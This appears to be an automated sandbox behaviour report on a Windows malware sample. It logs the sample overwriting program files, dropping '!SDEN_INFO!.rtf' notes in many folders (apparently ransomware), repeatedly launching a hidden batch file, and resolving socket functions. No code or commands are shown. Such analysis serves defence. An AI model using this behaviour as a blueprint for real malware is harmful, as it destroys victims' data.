| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Accessibility.api | size = 32768 |
|
1 | |
| Write | C:\Program Files\UNP\Logs\UniversalNotificationPlatform.020.etl | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\review_same_reviewers.gif | size = 2378 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\DVA.api | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | size = 9608 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\sl-SI\index.html | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\sl-SI\index.html | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | size = 61440 |
|
8 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\manifest.json | size = 1683 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\DVA.api | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\trash.gif | size = 2577 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\RHP_icons_2x.png | size = 3135 |
|
1 | |
| Write | C:\Program Files\UNP\Logs\UniversalNotificationPlatform.020.etl | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\adobepdf.xdc | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\adobepdf.xdc | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\UIThemes\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\browser\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\ca-ES-valencia\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\en-HK\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\es-CL\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\fr-CA\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\fr-CH\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\it-IT\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\ja-JP\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\nl-BE\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\nl-NL\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\sk-SK\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\zh-TW\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\eBook.api | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\eBook.api | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\AppCenter_R.aapp | size = 1710 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\rt.jar | size = 17800 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\rt.jar | size = 61440 |
|
34 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\rt.jar | size = 8192 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\init.js | size = 9047 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\apple-touch-icon-114x114-precomposed.png | size = 6189 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\sl-SI\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\illustrations.png | size = 5901 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner_dark.gif | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner_dark.gif | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\hscroll-thumb.png | size = 1679 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-left-pressed.gif | size = 1472 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Updater.api | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\tzdb.dat | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\Logs\UniversalNotificationPlatform.021.etl | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\PDDom.api | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\A12_Spinner_2x.gif | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\PDDom.api | size = 32768 |
|
1 | |
| Write | C:\Program Files\UNP\Logs\UniversalNotificationPlatform.021.etl | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\tzdb.dat | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Updater.api | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Edit_R_RHP.aapp | size = 1817 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-right-pressed.gif | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-right-pressed.gif | size = 1472 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\Accessible.tlb | size = 4424 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\ccloud.png | size = 3538 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Redact_R_RHP.aapp | size = 1819 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-il\ui-strings.js | size = 4984 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Certificates_R.aapp | size = 2105 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\EPDF_Full.aapp | size = 1805 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\StorageConnectors.api | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\StorageConnectors.api | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_hiContrast_wob.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_hiContrast_wob.png | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\end_review.gif | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\end_review.gif | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Scan_R_RHP.aapp | size = 5090 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Scan_R_RHP.aapp | size = 1873 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\pmd.cer | size = 1836 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\dictionaries\en-US.dic | size = 5512 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\dictionaries\en-US.dic | size = 61440 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\dictionaries\en-US.dic | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | size = 61440 |
|
2 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | size = 8192 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sv-se\ui-strings.js | size = 4974 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons_highcontrast_retina.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons_highcontrast_retina.png | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\da-dk\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\da-dk\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\cryptocme.sig | size = 4348 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress-indeterminate.gif | size = 2545 |
|
1 | |
|
For performance reasons, the remaining 4001 entries are omitted.
The remaining entries can be found in glog.xml. |
|||||
Registry (12)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Embarcadero\Locales | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Embarcadero\Locales | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\CodeGear\Locales | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\CodeGear\Locales | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Borland\Locales | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Borland\Delphi\Locales | - |
|
2 |
Process (28)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\WINDOWS\system32\cmd.exe | os_pid = 0xe9c, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\NWqZQdpD.exe | os_pid = 0xc58, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_SHOW |
|
1 | |
| Create | C:\WINDOWS\system32\cmd.exe | os_pid = 0x10fc, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\WINDOWS\system32\cmd.exe | os_pid = 0x1104, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | os_pid = 0x1194, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | os_pid = 0x1208, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | os_pid = 0x1304, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | os_pid = 0x13cc, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | os_pid = 0x1088, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | os_pid = 0x10cc, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | os_pid = 0xeb4, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | os_pid = 0x1124, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | os_pid = 0x1204, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | os_pid = 0xe60, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | os_pid = 0xd64, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | os_pid = 0x138c, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | os_pid = 0xed0, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | os_pid = 0x13fc, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | os_pid = 0x13c4, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | os_pid = 0x1334, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | os_pid = 0x910, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | os_pid = 0xfac, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | os_pid = 0x1268, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | os_pid = 0xce8, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | os_pid = 0xe10, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | os_pid = 0xf30, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | os_pid = 0x11f8, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x75e90000 |
|
1 | |
| Load | ws2_32.dll | base_address = 0x746a0000 |
|
1 | |
| Get Handle | c:\users\fd1hvy\desktop\m.exe | base_address = 0x400000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
6 | |
| Get Handle | c:\windows\syswow64\oleaut32.dll | base_address = 0x75bb0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\ole32.dll | base_address = 0x77920000 |
|
1 | |
| Get Filename | c:\users\fd1hvy\desktop\m.exe | process_name = c:\users\fd1hvy\desktop\m.exe, file_name_orig = C:\Users\FD1HVy\Desktop\m.exe, size = 522 |
|
1 | |
| Get Filename | - | process_name = c:\users\fd1hvy\desktop\m.exe, file_name_orig = C:\Users\FD1HVy\Desktop\m.exe, size = 261 |
|
12 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetThreadPreferredUILanguages, address_out = 0x75ea7250 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadPreferredUILanguages, address_out = 0x75ea4f10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetThreadUILanguage, address_out = 0x75ea7290 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetNativeSystemInfo, address_out = 0x75ea5130 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDiskFreeSpaceExW, address_out = 0x75efeea0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x75ea71b0 |
|
2 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VariantChangeTypeEx, address_out = 0x75bca610 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarNeg, address_out = 0x75c152c0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarNot, address_out = 0x75c16560 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarAdd, address_out = 0x75bed610 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarSub, address_out = 0x75bee3e0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarMul, address_out = 0x75bedb10 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarDiv, address_out = 0x75c15800 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarIdiv, address_out = 0x75c161a0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarMod, address_out = 0x75c16400 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarAnd, address_out = 0x75be3200 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarOr, address_out = 0x75c16610 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarXor, address_out = 0x75c167b0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarCmp, address_out = 0x75bd60b0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarI4FromStr, address_out = 0x75bd6ec0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarR4FromStr, address_out = 0x75be3010 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarR8FromStr, address_out = 0x75be3630 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarDateFromStr, address_out = 0x75bd8b90 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarCyFromStr, address_out = 0x75bc2d90 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBoolFromStr, address_out = 0x75bd48f0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBstrFromCy, address_out = 0x75bd7f50 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBstrFromDate, address_out = 0x75bd89c0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBstrFromBool, address_out = 0x75bd48a0 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoCreateInstanceEx, address_out = 0x75d62d10 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoInitializeEx, address_out = 0x75d32590 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoAddRefServerProcess, address_out = 0x75d5b8b0 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoReleaseServerProcess, address_out = 0x75d5b350 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoResumeClassObjects, address_out = 0x75d55c80 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoSuspendClassObjects, address_out = 0x75cbc190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeConditionVariable, address_out = 0x77c13a00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WakeConditionVariable, address_out = 0x77c88c50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WakeAllConditionVariable, address_out = 0x77c18a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SleepConditionVariableCS, address_out = 0x7500fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSAIoctl, address_out = 0x746ae800 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = __WSAFDIsSet, address_out = 0x746b8fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = closesocket, address_out = 0x746b0910 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = ioctlsocket, address_out = 0x746afa10 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSAGetLastError, address_out = 0x746b8fe0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSAStartup, address_out = 0x746a5b40 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSACleanup, address_out = 0x746b7170 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = accept, address_out = 0x746de430 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = bind, address_out = 0x746b1cc0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = connect, address_out = 0x746a5410 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getpeername, address_out = 0x746b43d0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getsockname, address_out = 0x746b3750 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getsockopt, address_out = 0x746b3b30 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = htonl, address_out = 0x746a49d0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = htons, address_out = 0x746b8ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = inet_addr, address_out = 0x746b9160 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = inet_ntoa, address_out = 0x746b9450 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = listen, address_out = 0x746a4be0 |
|
1 | |
